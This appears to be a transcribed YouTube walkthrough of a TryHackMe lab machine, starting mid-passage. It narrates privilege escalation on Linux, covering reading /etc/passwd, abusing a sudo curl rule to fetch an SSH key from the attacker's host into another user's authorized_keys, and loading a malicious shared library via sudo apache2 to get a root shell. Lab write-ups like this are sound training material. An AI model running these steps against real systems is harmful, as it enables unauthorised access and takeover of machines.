password. RGS card 2209. I think that's the password of the user RGS card. Okay, let's go. Let's go here. Yeah, probably here. And here I can simply go, and since we actually in this command, since we entered the ampersand at the background, this particular session is running in the background, so we can access this shell as usual. What I need to do, I tend to check something here, right? let's see. Yeah, cat etc passwd pipe grep ends with shell. I'll be checking who are all having this shell access. It says only root, but I guess since we got this password rjscard2209, we can simply log in this machine as this user rjscard. So let me change this rjscard2209. So this will be the password, hopefully. Yeah, now we logged in as the user rjscard. Okay, now let's see where are we right now. It's not having anything. Now let's read the etc passwd. etc passwd pipe grepping to the user who has shell access. So there are 3 users apart from root: Vagrant, rjscard, and Dolivav. So now we are rjscard, and we are having the bash access. So we logged in, and my present working executed a wrong command. Present working directory. So let me go here one directory back, and I'm trying to log into Dolivav. Permission denied, so I need that particular user's access. So let's see. As I said, we are still, I think I logged in as the particular, I logged into that machine, the exact machine. So here, if I go and see etc host, yeah, I logged into that machine, Ubuntu Jammy. Cat, let's see the container details. Cat, proc net arp. Yeah, here I can see the IP. I think these 2 IPs are TryHackMe's network, I guess. So 4 and 3. Okay. IPA. Yeah, here I'm having all the interfaces. 172.18 is actually the Docker network. 1010 network is actually, this is actually that machine's TryHackMe network. Okay, now fine. We logged into the machine. Now what else I can do? Maybe I can check for the sudo privilege. So when I check this, it is asking me to enter the password. So I go here, yeah, copy this, yeah, paste it here. Look at this. So potentially we are having some previous to user Dolivav. We can execute this curl command as user Dolivav. So with curl, can we escalate the privileges? Let's see. This particular page is no longer required. So I'm closing this. Yeah, I'm closing this. I go here and search for GTFO bins. So similar to living off the land for Windows, GTFO bin is for Linux. So here we can see all the Linux utilities that we can use for Previsk. You can see by using curl we can perform these multiple activities: file write, file read, file upload, SUID, oh god, file to save. Fetch a remote file via HTTP GET request. So look at the pseudo privilege escalation here. So it is actually reaching an attacker host to get a file, saving a file, then okay, I think this is the simple curl command, reaching an attacker IP and saving a file. Okay, but if we only have the program curl to run as another user, then we can try this against it. But since we have 127.0.0.1, I think this is not the proper one. Probably we can try this kind of thing, the same kind of thing. So let me check that. For example, um, sudo -u dolivav. Okay, so as this particular dolivav user, I'm gonna go and uh, check whether this particular user is having any file access. Let's see. Curl 127.0.0.1, and here in this particular page, what I can access. Let's see. I think let me go and check this web app folder where www html, and here, sorry, here I'm having index.html. Okay, let me give this sudo -u dolivav. So I'm executing this as dolivav. usr bin curl 127.0.0.1, and I'm accessing the page index.html -o index.html. Failure writing the output to the destination. So let me come to this, come to my base directory, and from here I'll try this. Again, failed to write to the destination. How about writing it in the temp? It written in temp. Let's see. Temp (271) cat index dot not found. It says not found. So what it does, looks like it is trying to access the port 80, the web server on port 80. Okay. So since it is trying to access the web server on port 80, what I can do, probably I can mention like this. Okay, I go here, harm to self, harm to self. Here I need probably index.php, because we knew we have this page. So let's try that, index.php. So I'll write this. What happened? How about login.php? Okay. Okay, anyway, that doesn't matter. Index.html is fair enough. So I just need to check whether I'm able to write a file into the file system by executing this. So when I'm executing this curl command as dolivav, I'm able to write some files to the temp directory. So with this, I can simply going to look for another thing. Probably what I can do, can I write a file with this, or can I read? Okay, let me read, otherwise I'll go and because I knew this particular command is executed as dolivav. So the dolivav is writing something on this temp directory. While the dolivav is able to write something on the temp directory, I think he'll be able to write something on his own home directory. If he is able to write something on the home directory, then why don't we try and write something on probably on it's his SSH folder. I think that's good. That's good. Let's see. Let's try that. That's what I'm going to try right now. Okay. So in this page, I'll create SSH keygen hyphen help. I'll mention the strong bits / 4096 and protocol as RSA, T as RSA. Okay, -T RSA-B 4096. So this is what I need to mention. Okay, generating a public and private key pair. It will be saving it as, maybe I'll name it as dolivow since I'm generating it for that user. Dolivow RSA. How about that? Yeah, no passphrase. And now I have generated this dolivow RSA. Cat dolivow RSA.pub. Okay, now I have this particular file with me, and the Python server is running on this. So I'll reinitiate it. Okay, it is running on this page, so no problem. I'll go here and I will run this command. I'll tweak this command and run. But since okay, let me show this sudo -l. Here it says it can only execute the curl with the command that starts with the URL that starts with 127.0.0.1. But in the beauty of curl is we can fetch multiple URLs at the same time, and we can write multiple files. So that's what I'm going to do right now. The first file is this one, so it will be reaching the index.html, and the second file would be like this, http:// my IP address 10.17.22.235 on port 8000, then dolivow underscore RSA.pub. So this file it will be accessing, and I'll be outputting that file in the dolivow's home directory. So for that I'll be accessing his home directory, dolivow, then .ssh, then authorized keys. So I'll be putting them in the file authorized keys, in this particular file. Now let's see. We know both the URLs is valid, so it will be fetching the details from both the URLs, and it will be writing both the files successfully. If it writes, then we will be able to log in this machine as the user dolivow, since we have the private key generated. And look at this, we don't have any error right now. The first file is written and the second file is also written, and you can see it wrote something. So I think it is there right now. So let me go here and look for this private key here. So I need to change the permission of private key. So I mentioned permission 600. That's fine right now. SSH-i dolivow underscore RSA. The username is dolivow @ IP address would be 10.10.214.227. 10.10.214.227. Fine. Now you can see we logged in this machine as the user dolivow because this particular curl command worked properly. We were able to write, where it is, yeah, we were able to write the public key into the dolivow's directory. Hence we are able to log in as the user dolivow. Where is that? Yeah, okay, now we logged in as dolivow, and here is the user flag. Now from this we need to escalate this privilege to root. Since I solved this machine, I knew there is another user called vagrant, but we don't need that. We can directly escalate privilege from here to root. So let's see how we can do that. First of all, I will check ID. I don't have any other group apart from my group. Then what else? Let me check sudo. I'm checking some basic details, and look at this. So here is the previous part. So I can run Apache 2 as root with no password. So I don't need to give the password. I can simply run this Apache 2. So how we can escalate the privileges from Apache by using this particular no password access. So let's see. I'm going to GTFO bins once again. This time I'll search for Apache 2, and look at this. It is there in our GTFO bins, and it says we'll be able to read any file as a root by using this Apache 2. So with this, we will be able to we can able to read any file as root. So with this, we can try to read the root flag simply, but without getting the root shell, I don't need to, I'm not ready to read the root flag. So instead, I actually did some chat GPT research, and I found a simple script that will be helping us to escalate the privileges. Okay. Let's see this. I'll tell you how to do that. Do I have GCC here? No, I don't have GCC. So I'm going to use my base machine. I don't need this anymore. So I'm closing this. I have GCC here. I knew that. So let's see. I go to a Sublime Text. So here is the default program. So I create a program called maybe malicious.c. So I'm going to create a C program. Yeah. So let me create this. Include stdio.h, include standardlib.h. That's fine. Then I put void __ attribute __ constructor init, like this. So within this, I will be able to execute the system command. So this is actually a simple C program. I'll be compiling it as a Linux library, and I'll be loading this library via Apache by using Apache. So when Apache loads this library, this command will be executed as that particular user who runs the Apache. Since we know Apache 2 is ran by root user, will be able to escalate the privilege in that way. Okay, so this is what attribute. I don't want to get any typo here. Attribute __ constructor. That's fine. Init. I'm opening the curly braces. System bin bash and terminating it properly. All right, this is fine. This should do the work. I'll be compiling it. So let's do that. Shared -o malicious.so. This will be the Linux library that I'll be compiling to. Malicious.c is the source file. -fpic. So this is the command. So let's see what this fpic means. I'll ask ChatGPT to answer this. Sorry. What -fpic flag in GCC? Post independent code. Purpose of API ensures that the generated code can be loaded at any memory address. Okay, necessary for creating shared libraries, SO files. Okay, since we are creating this shared library, this fpic is necessary. Helps to reduce the text relocation, improves efficiency in ASLR security. ASLR is actually a security mechanism in Linux, address space layout randomization. So whenever the program loads newly into the memory, it will be loaded in a new memory address. That's what it means. So since we are using fpic, it will be helping us to bypass this stuff. Okay, compile position independent object file. Yeah. So, and here is the command that we are using. The similar to our command. Yeah. fpic compile. Okay, we can use these two commands. Otherwise, we can use this just single command to rule out that ASLR depend or ASLR issues. Okay, now it is successfully compiled. We have malicious.so. Now what I can do? Probably I can put this in our in the Dolivav's home directory. Let's see. I think he's having curl, right? Yeah, curl http:// 10 17 22 235 port 8000, and here malicious.so -o malicious.so. So I'm fetching this file and writing here. It is written. Now I got this add library malicious.so. See, okay, executable is not required because it's a library. It's not going to get executed. It will be used by the executable though. Fine. Now all we need to do is to make the Apache to utilize this shared library. When it pulls this shared library, we will be able to see the root shell here. So let's do that. I know I can use sudo with no password, Apache2, and here -x to put it in a debugging mode, I guess, -d to mention the directory. I know there is a directory called etc apache2. So this is the apache2 directory, and here in this directory only that configuration file is present. The apache2.config is the current Apache2 configuration that is used by the Apache web servers. So that's why I'm using it. Sudo apache2 -x and -d to mention the directory, and apache2, that's fine, and -f. I'm mentioning that particular configuration file now. So for that, I'm again referring that path apache2 and apache2.conf. That will be the stuff. And -c, this is where I'll be mentioning the particular shared library, because I'll be loading it as malicious module. So that's what I'm going to do. Load module. Okay, load module, and here I'm mentioning this. I'm giving a new name to this module. So I'm giving malicious module like this. Okay, and now all we need to do is to pull that library, that malicious library that we have, Dolivav. So it is in the home directory of the user. I don't want any typo here. So let's see, malicious.so home Dolivav malicious module load module. So it is loading the module within this Apache conf, I guess. It will eventually giving us the root shell. What? Did I do any mistake? I guess I didn't close the double quote. Now I closed it. Look at this. I got the root shell. Who am I? I am the root right now. Sorry. I am the root right now. I escalated it to root. So when I go to root directory, I can grab the root.txt. Okay. And yeah, this is the machine. This is what I wanted to showcase. I learned a lot, particularly while solving this machine for the first time. I took some time to solve this, but I learned a lot while solving this. Hope you enjoyed this. You have learned something new. If you really did, do considering subscribing my channel and do the YouTube algorithms, like, comment, subscribe. I'll catch you next time with another exciting one. Until then, I'm signing off. Cheers, and love you all. Thank you so much.